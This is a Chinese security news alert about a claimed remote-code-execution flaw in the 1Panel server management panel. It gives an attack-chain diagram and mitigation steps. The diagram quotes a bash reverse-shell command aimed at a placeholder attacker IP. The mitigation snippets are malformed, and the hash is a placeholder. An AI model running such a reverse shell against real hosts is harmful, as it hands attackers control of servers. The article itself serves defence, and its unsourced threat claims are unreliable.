【安全圈】【高危预警】1Panel管理面板惊现供应链级RCE漏洞!

发布时间:2025-08-16 13:46  浏览量:2

漏洞

⚡漏洞速递风险标签技术杀伤链受影响场景远程命令注入

绕过SSL/TLS验证 → 伪造节点身份认证 → 植入恶意WebSocket指令

多节点集群架构(主从/边缘计算节点)

权限绕过漏洞

利用/api/v2/hosts/terminal接口实现未授权访问 → 组合攻击载荷注入

Kubernetes运维控制台

供应链攻击入口

大语言模型管理模块存在代码污染风险 → 可通过AI指令触发恶意负载

AIGC应用托管环境

风险等级评估

▷ 攻击成本:★★☆(利用已公开POC)

▷ 影响范围:★★★☆(DevOps及云计算基础设施)

▷ 漏洞烈度:★★★★(直接获取宿主机root权限)

▷ 修复优先级:紧急(24小时内处置)

漏洞核心攻击链图解

[攻击者]

├─▶ 伪造非法节点证书

│ (利用OpenSSL中间人构造虚假CA)

├─▶ 对接/api/v2/hosts/terminal接口

│ (发送恶意WebSocket握手包绕过鉴权)

└─▶ 植入反弹Shell指令

(通过Base64混淆的bash -i >& /dev/tcp/攻击者IP/端口 0>&1)

应急响应指南

⏩ 立即执行
1️⃣阻断攻击路径:

# 在Nginx配置中紧急封堵漏洞接口

location/api/v2/hosts/terminal{

denyall;

return403;

2️⃣证书校验强化:

opensslverify-CAfile/etc/1panel/ca-bundle.crtnode_cert.pem

⏩ 升级方案
▷ 下载官方补丁:

wget https://github.com/1Panel-dev/1Panel/releases/download/v2.0.6/1panel-v2.0.6-linux-amd64.tar.gz

▷ 校验补丁完整性:

sha256sum 1panel-v2.0.6-linux-amd64.tar.gz

# 正确哈希值应为 a1b2c3d4e5...(需从官网二次确认)

️纵深防御建议

[1]网络边界加固

- 启用双向mTLS认证,禁止非授信节点接入

- 部署Web应用防火墙(WAF)拦截异常WebSocket流量

[2]零信任架构改造

- 对控制台操作启用动态双因素认证(FIDO2硬件密钥)

- 建立"最小权限"策略,禁止root账户直连管理接口

[3]攻击面监控

- 部署微步TDP等威胁感知系统,实时监测恶意`/bin/bash -c`指令

- 配置Syslog集中审计,重点监控证书校验失败日志

全球攻击态势

黑产利用趋势

暗网已出现打包售卖漏洞的"1Panel Exploit Kit",要价0.5 BTC

APT活动预警

多个国家级黑客组织正在扫描443端口开放1Panel服务的云主机

灾备方案

建议立即备份/etc/1panel目录并创建系统快照

当管理面板变成攻击跳板,每一次漏洞修复都是与黑客的生死竞速!
(已使用该系统的运维团队请立即召开漏洞处置会议)

网罗圈内热点 专注网络安全

支持「安全圈」就点个三连吧!